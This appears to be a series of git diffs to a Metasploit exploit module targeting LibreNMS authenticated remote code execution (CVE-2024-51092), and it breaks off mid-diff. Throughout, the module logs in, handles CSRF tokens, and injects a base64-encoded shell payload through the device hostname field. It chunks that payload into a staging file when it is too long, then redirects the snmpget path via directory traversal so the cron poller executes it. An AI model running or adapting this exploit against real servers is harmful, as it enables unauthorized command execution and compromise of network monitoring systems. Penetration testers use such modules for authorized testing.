         print_status("Deleted device: #{device_id}") if res&.code == 200
       end
     elsif @device_ids
-      print_status("Failed to delete devices: #{@device_ids.join(',')}")
+      print_status("Failed to extract CSRF token. Failed to delete devices: #{@device_ids.join(',')}")
     end
   end
 

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -65,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_csrf_token(res)
-    return res&.get_html_document&.at('meta[name="csrf-token"]') ? res.get_html_document.at('meta[name="csrf-token"]')['content'] : nil
+    res&.get_html_document&.at('meta[name="csrf-token"]') ? res.get_html_document.at('meta[name="csrf-token"]')['content'] : nil
   end
 
   def check
@@ -77,10 +77,10 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Unknown('LibreNMS is not detected.') unless res&.code == 200 && res&.body&.include?('<title>LibreNMS</title>')
 
     token = get_csrf_token(res)
-    return Exploit::CheckCode::Unknown('Failed to extract csrf token.') unless token
+    return Exploit::CheckCode::Unknown('LibreNMS detected. Failed to extract csrf token.') unless token
 
     login
-    return Exploit::CheckCode::Detected('LibreNMS detected. Login failed and version is unknown.') unless @cookies
+    return Exploit::CheckCode::Detected('LibreNMS detected. Failed to login and version is unknown.') unless @cookies
 
     res = send_request_cgi({
       'method' => 'GET',

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -71,8 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'login'),
-      'keep_cookies' => true
+      'uri' => normalize_uri(target_uri.path, 'login')
     })
     return Exploit::CheckCode::Unknown('LibreNMS is not detected.') unless res&.code == 200 && res&.body&.include?('<title>LibreNMS</title>')
 
@@ -80,12 +79,10 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Unknown('LibreNMS detected. Failed to extract csrf token.') unless token
 
     login
-    return Exploit::CheckCode::Detected('LibreNMS detected. Failed to login and version is unknown.') unless @cookies
 
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'about'),
-      'cookie' => @cookies
+      'uri' => normalize_uri(target_uri.path, 'about')
     })
     return Exploit::CheckCode::Detected('LibreNMS detected. Version is unknown.') unless res&.code == 200
 
@@ -106,11 +103,10 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     fail_with(Failure::Unknown, 'Failed to access the login page.') unless res&.code == 200
 
-    cookies = res.get_cookies
     login_res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'login'),
-      'cookie' => cookies,
+      'keep_cookies' => true,
       'vars_post' => {
         'username' => datastore['USERNAME'],
         'password' => datastore['PASSWORD'],
@@ -121,17 +117,16 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path),
-      'cookie' => login_res.get_cookies
+      'uri' => normalize_uri(target_uri.path)
     })
     fail_with(Failure::Unknown, 'Failed to log into LibreNMS.') unless res&.code == 200 && res.body.include?('Devices')
 
-    @cookies = login_res.get_cookies
+    @logged_in = true
     print_status('Successfully logged into LibreNMS.')
   end
 
   def exploit
-    login unless @cookies
+    login unless @logged_in
     add_host
 
     [1, datastore['RETRY']].max.times do |i|
@@ -146,8 +141,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unknown, 'Failed to update snmpget.') unless res
       send_request_cgi({
         'method' => 'GET',
-        'uri' => normalize_uri(target_uri.path, 'about'),
-        'cookie' => @cookies
+        'uri' => normalize_uri(target_uri.path, 'about')
       })
       sleep 3
     end
@@ -156,8 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def add_host
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'addhost'),
-      'cookie' => @cookies
+      'uri' => normalize_uri(target_uri.path, 'addhost')
     })
     fail_with(Failure::Unknown, 'Failed to access addhost page.') unless res&.code == 200
     @hosts = []
@@ -169,7 +162,6 @@ class MetasploitModule < Msf::Exploit::Remote
       res = send_request_cgi({
         'method' => 'POST',
         'uri' => normalize_uri(target_uri.path, 'addhost'),
-        'cookie' => @cookies,
         'vars_post' => {
           '_token' => get_csrf_token(res),
           'hostname' => host,
@@ -207,9 +199,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def change_snmpget(host)
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'settings/external/binaries'),
-      'keep_cookies' => true,
-      'cookie' => @cookies
+      'uri' => normalize_uri(target_uri.path, 'settings/external/binaries')
     })
     return unless res&.code == 200
 
@@ -219,7 +209,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'X-CSRF-TOKEN' => get_csrf_token(res)
       },
       'uri' => normalize_uri(target_uri.path, 'settings/snmpget'),
-      'cookie' => res.get_cookies,
       'ctype' => 'application/json',
       'data' => {
         'value' => "file://#{datastore['PATH']}/rrd/#{host}/../../../../../bin/ls"
@@ -233,9 +222,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'settings/external/binaries'),
-      'keep_cookies' => true,
-      'cookie' => @cookies
+      'uri' => normalize_uri(target_uri.path, 'settings/external/binaries')
     })
 
     if res&.code == 200
@@ -244,8 +231,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'headers' => {
           'X-CSRF-TOKEN' => get_csrf_token(res)
         },
-        'uri' => normalize_uri(target_uri.path, 'settings/snmpget'),
-        'cookie' => @cookies
+        'uri' => normalize_uri(target_uri.path, 'settings/snmpget')
       })
     end
     print_status('Failed to reset snmpget to default.') unless res&.code == 200
@@ -253,8 +239,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'delhost'),
-      'cookie' => @cookies
+      'uri' => normalize_uri(target_uri.path, 'delhost')
     })
     token = get_csrf_token(res)
 
@@ -263,7 +248,6 @@ class MetasploitModule < Msf::Exploit::Remote
         res = send_request_cgi({
           'method' => 'POST',
           'uri' => normalize_uri(target_uri.path, 'delhost'),
-          'cookie' => @cookies,
           'vars_post' => {
             '_token' => token,
             'id' => device_id,

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -65,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_csrf_token(res)
-    return unless res&.get_html_document&.at('meta[name="csrf-token"]')
+    return res&.get_html_document&.at('meta[name="csrf-token"]') ? res.get_html_document.at('meta[name="csrf-token"]')['content'] : nil
 
     res.get_html_document.at('meta[name="csrf-token"]')['content']
   end

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -83,7 +83,11 @@ class MetasploitModule < Msf::Exploit::Remote
     token = get_csrf_token(res)
     return Exploit::CheckCode::Unknown('LibreNMS detected. Failed to extract csrf token.') unless token
 
-    login
+    begin
+      login
+    rescue StandardError => e
+      return Exploit::CheckCode::Unknown(e)
+    end
 
     res = send_request_cgi({
       'method' => 'GET',

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -140,10 +140,7 @@ class MetasploitModule < Msf::Exploit::Remote
       break if @hosts.all? { |h| change_snmpget(h) }
     end
 
-    fail_with(
-      Failure::Unknown,
-      'Failed to create malicious files. You may need more wait time, or the cron job might be disabled.'
-    ) unless @hosts.all? { |h| change_snmpget(h) }
+    fail_with(Failure::Unknown, 'Failed to create malicious files. You may need more wait time, or the cron job might be disabled.') unless @hosts.all? { |h| change_snmpget(h) }
     @hosts.each do |host|
       res = change_snmpget(host)
       fail_with(Failure::Unknown, 'Failed to update snmpget.') unless res

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Retry
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(
@@ -42,7 +43,11 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         ],
         'DefaultOptions' => {
-          'FETCH_DELETE' => true
+          'FETCH_FILENAME' => Rex::Text.rand_text_alpha(1),
+          'FETCH_URIPATH' => Rex::Text.rand_text_alpha(1)
+        },
+        'Payload' => {
+          'SPACE' => 128
         },
         'DefaultTarget' => 0,
         'DisclosureDate' => '2024-11-15',
@@ -131,19 +136,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Waiting up to #{datastore['WAIT']} seconds for cron to poll the device...")
     created = retry_until_truthy(timeout: datastore['WAIT']) do
-      @hosts.all? { |h| change_snmpget(h) }
+      change_snmpget
     end
 
     fail_with(Failure::Unknown, 'Failed to create malicious files. You may need more wait time, or the cron job might be disabled.') unless created
-    @hosts.each do |host|
-      res = change_snmpget(host)
-      fail_with(Failure::Unknown, 'Failed to update snmpget.') unless res
-      send_request_cgi({
-        'method' => 'GET',
-        'uri' => normalize_uri(target_uri.path, 'about')
-      })
-      sleep 3
-    end
+    register_file_for_cleanup(datastore['FETCH_FILENAME'])
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'about')
+    })
   end
 
   def add_host
@@ -152,50 +153,45 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'addhost')
     })
     fail_with(Failure::Unknown, 'Failed to access addhost page.') unless res&.code == 200
-    @hosts = []
-    @device_ids = []
-    # The maximum host length is 128 characters, so the payload must be split.
-    payload.encoded.split(';').each do |pl|
-      host = "#{rand_text_alphanumeric(3, '/')};echo #{Rex::Text.encode_base64(pl)}|base64 -d|bash;#"
-      fail_with(Failure::Unknown, 'Failed to limit the host length to 128 characters or less.') unless host.length <= 128
-      res = send_request_cgi({
-        'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, 'addhost'),
-        'vars_post' => {
-          '_token' => get_csrf_token(res),
-          'hostname' => host,
-          'snmp' => 'on',
-          'sysName' => '',
-          'hardware' => '',
-          'os' => '',
-          'os_id' => '',
-          'snmpver' => 'v2c',
-          'port' => '',
-          'transport' => 'udp',
-          'port_assoc_mode' => 'ifIndex',
-          'community' => '',
-          'authlevel' => 'noAuthNoPriv',
-          'authname' => '',
-          'authpass' => '',
-          'authalgo' => 'SHA',
-          'cryptopass' => '',
-          'cryptoalgo' => 'AES',
-          'force_add' => 'on',
-          'Submit' => ''
-        }
-      })
-      fail_with(Failure::Unknown, 'Failed to add device.') unless res&.code == 200 && res&.body&.include?('Device added')
-      print_status("Added host: '#{host}'")
-      print_status("Actual payload: #{pl}")
-      @hosts << host
-      link = res&.get_html_document&.at("div.alert.alert-success:contains('Device added') a")
-      device_link = link['href'] if link
-      device_id = device_link.match(%r{/device/(\d+)})[1] if device_link&.match(%r{/device/(\d+)})
-      @device_ids << device_id if device_id
-    end
+    # The maximum host length is 128 characters.
+    @host = "#{rand_text_alphanumeric(1, '/')};echo #{Rex::Text.encode_base64(payload.encoded)}|base64 -d|bash;#"
+    print_status("Try to add host: '#{@host}', length: #{@host.length}")
+    fail_with(Failure::Unknown, 'Failed to limit the host length to 128 characters or less.') unless @host.length <= 128
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'addhost'),
+      'vars_post' => {
+        '_token' => get_csrf_token(res),
+        'hostname' => @host,
+        'snmp' => 'on',
+        'sysName' => '',
+        'hardware' => '',
+        'os' => '',
+        'os_id' => '',
+        'snmpver' => 'v2c',
+        'port' => '',
+        'transport' => 'udp',
+        'port_assoc_mode' => 'ifIndex',
+        'community' => '',
+        'authlevel' => 'noAuthNoPriv',
+        'authname' => '',
+        'authpass' => '',
+        'authalgo' => 'SHA',
+        'cryptopass' => '',
+        'cryptoalgo' => 'AES',
+        'force_add' => 'on',
+        'Submit' => ''
+      }
+    })
+    fail_with(Failure::Unknown, 'Failed to add device.') unless res&.code == 200 && res&.body&.include?('Device added')
+    print_status('Added host.')
+    print_status("Actual payload: #{payload.encoded}")
+    link = res&.get_html_document&.at("div.alert.alert-success:contains('Device added') a")
+    device_link = link['href'] if link
+    @device_id = device_link.match(%r{/device/(\d+)})[1] if device_link&.match(%r{/device/(\d+)})
   end
 
-  def change_snmpget(host)
+  def change_snmpget
     res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'settings/external/binaries')
@@ -210,7 +206,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'settings/snmpget'),
       'ctype' => 'application/json',
       'data' => {
-        'value' => "file://#{datastore['PATH']}/rrd/#{host}/../../../../../bin/ls"
+        'value' => "file://#{datastore['PATH']}/rrd/#{@host}/../../../../../bin/ls"
       }.to_json
     })
     res&.code == 200
@@ -242,22 +238,20 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     token = get_csrf_token(res)
 
-    if res&.code == 200
-      @device_ids&.each do |device_id|
-        res = send_request_cgi({
-          'method' => 'POST',
-          'uri' => normalize_uri(target_uri.path, 'delhost'),
-          'vars_post' => {
-            '_token' => token,
-            'id' => device_id,
-            'confirm' => '1'
-          }
-        })
-        print_status("Failed to delete device: #{device_id}") unless res&.code == 200
-        print_status("Deleted device: #{device_id}") if res&.code == 200
-      end
-    elsif @device_ids
-      print_status("Failed to extract CSRF token. Failed to delete devices: #{@device_ids.join(',')}")
+    if res&.code == 200 && @device_id
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'delhost'),
+        'vars_post' => {
+          '_token' => token,
+          'id' => @device_id,
+          'confirm' => '1'
+        }
+      })
+      print_status("Failed to delete device: #{@device_id}") unless res&.code == 200
+      print_status("Deleted device: #{@device_id}") if res&.code == 200
+    elsif @device_id
+      print_status("Failed to extract CSRF token. Failed to delete device: #{@device_id}")
     end
   end
 

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -117,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
         '_token' => get_csrf_token(res)
       }
     })
-    fail_with(Failure::Unknown, 'Failed to log into LibreNMS.') unless login_res&.code == 302
+    fail_with(Failure::NoAccess, 'Failed to log into LibreNMS.') unless login_res&.code == 302
 
     res = send_request_cgi({
       'method' => 'GET',

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -142,15 +142,18 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Waiting up to #{datastore['WAIT']} seconds for cron to poll the device...")
     created = retry_until_truthy(timeout: datastore['WAIT']) do
-      change_snmpget
+      @hosts.all? { |h| change_snmpget(h) }
     end
 
     fail_with(Failure::Unknown, 'Failed to create malicious file. You may need more wait time, or the cron job might be disabled.') unless created
     register_file_for_cleanup(datastore['FETCH_FILENAME'])
-    send_request_cgi({
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'about')
-    })
+    @hosts.each do |host|
+      change_snmpget(host)
+      send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'about')
+      })
+    end
   end
 
   def add_host
@@ -160,44 +163,67 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     fail_with(Failure::Unknown, 'Failed to access addhost page.') unless res&.code == 200
     # The maximum host length is 128 characters.
-    @host = ";echo #{Rex::Text.encode_base64(payload.encoded)}|base64 -d|sh;"
-    print_status("Try to add host: '#{@host}', length: #{@host.length}")
-    fail_with(Failure::Unknown, 'Failed to limit the host length to 128 characters or less.') unless @host.length <= 128
-    res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'addhost'),
-      'vars_post' => {
-        '_token' => get_csrf_token(res),
-        'hostname' => @host,
-        'snmp' => 'on',
-        'sysName' => '',
-        'hardware' => '',
-        'os' => '',
-        'os_id' => '',
-        'snmpver' => 'v2c',
-        'port' => '',
-        'transport' => 'udp',
-        'port_assoc_mode' => 'ifIndex',
-        'community' => '',
-        'authlevel' => 'noAuthNoPriv',
-        'authname' => '',
-        'authpass' => '',
-        'authalgo' => 'SHA',
-        'cryptopass' => '',
-        'cryptoalgo' => 'AES',
-        'force_add' => 'on',
-        'Submit' => ''
-      }
-    })
-    fail_with(Failure::Unknown, 'Failed to add device.') unless res&.code == 200 && res&.body&.include?('Device added')
-    print_status('Added host.')
-    print_status("Actual payload: #{payload.encoded}")
-    link = res&.get_html_document&.at("div.alert.alert-success:contains('Device added') a")
-    device_link = link['href'] if link
-    @device_id = device_link.match(%r{/device/(\d+)})[1] if device_link&.match(%r{/device/(\d+)})
+    @hosts = [";echo #{Rex::Text.encode_base64(payload.encoded)}|base64 -d|sh;"]
+    print_status("Try to add host: '#{@hosts[0]}', length: #{@hosts[0].length}")
+    unless @hosts[0].length <= 128
+      print_status('Failed to limit the host length to 128 characters or less. Stage the command to a file.')
+      @hosts = []
+      # cannot contain `/`
+      staging_file = Rex::Text.rand_text_alpha(1, datastore['FETCH_FILENAME'])
+      register_file_for_cleanup(staging_file)
+      cmd = Rex::Text.encode_base64(payload.encoded)
+      # ;echo -n chunked_cmd>>staging_file;
+      # ;echo -n (space) = 9, >> = 2, ; = 1
+      max_chunk_size = 128 - (9 + 2 + staging_file.length + 1)
+      chunk_size = rand([1, max_chunk_size - 10].max..[1, max_chunk_size - 5].max)
+      print_status("Command chunk size = #{chunk_size}")
+      cmd_chunks = cmd.chars.each_slice(chunk_size).map(&:join)
+      redirector = '>'
+      cmd_chunks.each_with_index do |chunk, index|
+        print_status("Staging chunk #{index + 1} of #{cmd_chunks.count}")
+        @hosts << ";echo -n #{chunk}#{redirector}#{staging_file};"
+        redirector = '>>'
+      end
+      @hosts << ";cat #{staging_file} | base64 -d |sh;"
+    end
+    @device_ids = []
+    @hosts.each do |host|
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'addhost'),
+        'vars_post' => {
+          '_token' => get_csrf_token(res),
+          'hostname' => host,
+          'snmp' => 'on',
+          'sysName' => '',
+          'hardware' => '',
+          'os' => '',
+          'os_id' => '',
+          'snmpver' => 'v2c',
+          'port' => '',
+          'transport' => 'udp',
+          'port_assoc_mode' => 'ifIndex',
+          'community' => '',
+          'authlevel' => 'noAuthNoPriv',
+          'authname' => '',
+          'authpass' => '',
+          'authalgo' => 'SHA',
+          'cryptopass' => '',
+          'cryptoalgo' => 'AES',
+          'force_add' => 'on',
+          'Submit' => ''
+        }
+      })
+      fail_with(Failure::Unknown, 'Failed to add device.') unless res&.code == 200 && res&.body&.include?('Device added')
+      print_status('Added host.')
+      link = res&.get_html_document&.at("div.alert.alert-success:contains('Device added') a")
+      device_link = link['href'] if link
+      device_id = device_link.match(%r{/device/(\d+)})[1] if device_link&.match(%r{/device/(\d+)})
+      @device_ids << device_id if device_id
+    end
   end
 
-  def change_snmpget
+  def change_snmpget(host)
     res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'settings/external/binaries')
@@ -212,7 +238,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'settings/snmpget'),
       'ctype' => 'application/json',
       'data' => {
-        'value' => "file://#{datastore['PATH']}/rrd/#{@host}/../../../../../bin/ls"
+        'value' => "file://#{datastore['PATH']}/rrd/#{host}/../../../../../bin/ls"
       }.to_json
     })
     res&.code == 200
@@ -244,20 +270,22 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     token = get_csrf_token(res)
 
-    if res&.code == 200 && @device_id
-      res = send_request_cgi({
-        'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, 'delhost'),
-        'vars_post' => {
-          '_token' => token,
-          'id' => @device_id,
-          'confirm' => '1'
-        }
-      })
-      print_status("Failed to delete device: #{@device_id}") unless res&.code == 200
-      print_status("Deleted device: #{@device_id}") if res&.code == 200
-    elsif @device_id
-      print_status("Failed to extract CSRF token. Failed to delete device: #{@device_id}")
+    if res&.code == 200 && @device_ids
+      @device_ids.each do |device_id|
+        res = send_request_cgi({
+          'method' => 'POST',
+          'uri' => normalize_uri(target_uri.path, 'delhost'),
+          'vars_post' => {
+            '_token' => token,
+            'id' => device_id,
+            'confirm' => '1'
+          }
+        })
+        print_status("Failed to delete device: #{device_id}") unless res&.code == 200
+        print_status("Deleted device: #{device_id}") if res&.code == 200
+      end
+    elsif @device_ids
+      print_status("Failed to extract CSRF token. Failed to delete device: #{@device_ids.join(', ')}")
     end
   end
 

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -93,6 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     html_body = res&.get_html_document
     version_node = html_body&.at("a[@href='https://www.librenms.org/changelog.html']")
+    return Exploit::CheckCode::Unknown('Cannot find librenmsversion') if version_node.nil?
     version_node&.at('span')&.content = ''
     version = Rex::Version.new(version_node.text)
     return Exploit::CheckCode::Safe("LibreNMS version #{version} detected, which is not vulnerable.") unless version <= Rex::Version.new('24.9.1')

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Retry
 
   def initialize(info = {})
     super(
@@ -58,8 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('USERNAME', [ true, 'User name for LibreNMS', '' ]),
         OptString.new('PASSWORD', [ true, 'Password for LibreNMS', '' ]),
         OptString.new('PATH', [ true, 'LibreNMS installed location', '/opt/librenms' ]),
-        OptInt.new('WAIT', [ true, 'Wait time (seconds) for cron to poll the device', 30 ]),
-        OptInt.new('RETRY', [ true, 'Maximum wait time: WAIT x RETRY (seconds)', 11 ]),
+        OptInt.new('WAIT', [ true, 'Wait time (seconds) for cron to poll the device', 75 ]),
       ]
     )
   end
@@ -129,13 +129,12 @@ class MetasploitModule < Msf::Exploit::Remote
     login unless @logged_in
     add_host
 
-    [1, datastore['RETRY']].max.times do |i|
-      print_status("[#{i + 1}/#{datastore['RETRY']}] Waiting #{datastore['WAIT']} seconds for cron to poll the device...")
-      sleep datastore['WAIT']
-      break if @hosts.all? { |h| change_snmpget(h) }
+    print_status("Waiting up to #{datastore['WAIT']} seconds for cron to poll the device...")
+    created = retry_until_truthy(timeout: datastore['WAIT']) do
+      @hosts.all? { |h| change_snmpget(h) }
     end
 
-    fail_with(Failure::Unknown, 'Failed to create malicious files. You may need more wait time, or the cron job might be disabled.') unless @hosts.all? { |h| change_snmpget(h) }
+    fail_with(Failure::Unknown, 'Failed to create malicious files. You may need more wait time, or the cron job might be disabled.') unless created
     @hosts.each do |host|
       res = change_snmpget(host)
       fail_with(Failure::Unknown, 'Failed to update snmpget.') unless res

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('USERNAME', [ true, 'User name for LibreNMS', '' ]),
         OptString.new('PASSWORD', [ true, 'Password for LibreNMS', '' ]),
         OptString.new('PATH', [ true, 'LibreNMS installed location', '/opt/librenms' ]),
-        OptInt.new('WAIT', [ true, 'Wait time (seconds) for cron to poll the device', 75 ]),
+        OptInt.new('WAIT', [ true, 'Wait time (seconds) for cron to poll the device', 315 ]),
       ]
     )
   end

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -79,7 +79,23 @@ class MetasploitModule < Msf::Exploit::Remote
     token = get_csrf_token(res)
     return Exploit::CheckCode::Unknown('Failed to extract csrf token.') unless token
 
-    Exploit::CheckCode::Detected('LibreNMS detected.')
+    login
+    return Exploit::CheckCode::Detected('LibreNMS detected. but login failed and version is unknown.') unless @cookies
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'about'),
+      'cookie' => @cookies
+    })
+    return Exploit::CheckCode::Detected('LibreNMS detected. but version is unknown.') unless res&.code == 200
+
+    html_body = res.get_html_document
+    version_node = html_body.at("a[@href='https://www.librenms.org/changelog.html']")
+    version_node.at('span').content = ''
+    version = Rex::Version.new(version_node.text)
+    return Exploit::CheckCode::Safe("LibreNMS version #{version} detected, which is not vulnerable.") unless version <= Rex::Version.new('24.9.1')
+
+    Exploit::CheckCode::Appears("LibreNMS version #{version} detected, which is vulnerable.")
   end
 
   def login
@@ -103,19 +119,19 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     fail_with(Failure::Unknown, 'Failed to log into LibreNMS.') unless login_res&.code == 302
 
-    @cookies = login_res.get_cookies
     res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path),
-      'cookie' => @cookies
+      'cookie' => login_res.get_cookies
     })
     fail_with(Failure::Unknown, 'Failed to log into LibreNMS.') unless res&.code == 200 && res.body.include?('Devices')
 
+    @cookies = login_res.get_cookies
     print_status('Successfully logged into LibreNMS.')
   end
 
   def exploit
-    login
+    login unless @cookies
     add_host
 
     [1, datastore['RETRY']].max.times do |i|

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -135,6 +135,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri' => normalize_uri(target_uri.path, 'about'),
         'cookie' => @cookies
       })
+      sleep 3
     end
   end
 
@@ -178,8 +179,9 @@ class MetasploitModule < Msf::Exploit::Remote
           'Submit' => ''
         }
       })
-      fail_with(Failure::Unknown, 'Failed to add device.') unless res&.code == 200
+      fail_with(Failure::Unknown, 'Failed to add device.') unless res&.code == 200 && res&.body&.include?('Device added')
       print_status("Added host: '#{host}'")
+      print_status("Actual payload: #{pl}")
       @hosts << host
       link = res&.get_html_document&.at("div.alert.alert-success:contains('Device added') a")
       device_link = link['href'] if link
@@ -243,7 +245,7 @@ class MetasploitModule < Msf::Exploit::Remote
     token = get_csrf_token(res)
 
     if res&.code == 200
-      @device_ids.each do |device_id|
+      @device_ids&.each do |device_id|
         res = send_request_cgi({
           'method' => 'POST',
           'uri' => normalize_uri(target_uri.path, 'delhost'),
@@ -257,8 +259,8 @@ class MetasploitModule < Msf::Exploit::Remote
         print_status("Failed to delete device: #{device_id}") unless res&.code == 200
         print_status("Deleted device: #{device_id}") if res&.code == 200
       end
-    else
-      print_status("Failed to delete devices: #{@device_ids&.join(',')}")
+    elsif @device_ids
+      print_status("Failed to delete devices: #{@device_ids.join(',')}")
     end
   end
 

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -65,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_csrf_token(res)
-    return unless res.get_html_document.at('meta[name="csrf-token"]')
+    return unless res&.get_html_document&.at('meta[name="csrf-token"]')
 
     res.get_html_document.at('meta[name="csrf-token"]')['content']
   end
@@ -181,7 +181,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unknown, 'Failed to add device.') unless res&.code == 200
       print_status("Added host: '#{host}'")
       @hosts << host
-      link = res.get_html_document.at("div.alert.alert-success:contains('Device added') a")
+      link = res&.get_html_document&.at("div.alert.alert-success:contains('Device added') a")
       device_link = link['href'] if link
       device_id = device_link.match(%r{/device/(\d+)})[1] if device_link&.match(%r{/device/(\d+)})
       @device_ids << device_id if device_id

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -162,32 +162,14 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'addhost')
     })
     fail_with(Failure::Unknown, 'Failed to access addhost page.') unless res&.code == 200
+
     # The maximum host length is 128 characters.
-# because 128 - 20 = 108 where 20 is length of remaining characters in original payload 
-if Rex::Text.encode_base64(payload.encoded).length <= 108
-    @hosts = [";echo #{Rex::Text.encode_base64(payload.encoded)}|base64 -d|sh;"]
-    print_status("Adding host: '#{@hosts[0]}', length: #{@hosts[0].length}")
-else
-     staging_file = Rex::Text.rand_text_alpha(1, datastore['FETCH_FILENAME'])
-           register_file_for_cleanup(staging_file)
-      cmd = Rex::Text.encode_base64(payload.encoded)
-      # ;echo -n chunked_cmd>>staging_file;
-      # ;echo -n (space) = 9, >> = 2, ; = 1
-      max_chunk_size = 128 - (9 + 2 + staging_file.length + 1)
-      chunk_size = rand([1, max_chunk_size - 10].max..[1, max_chunk_size - 5].max)
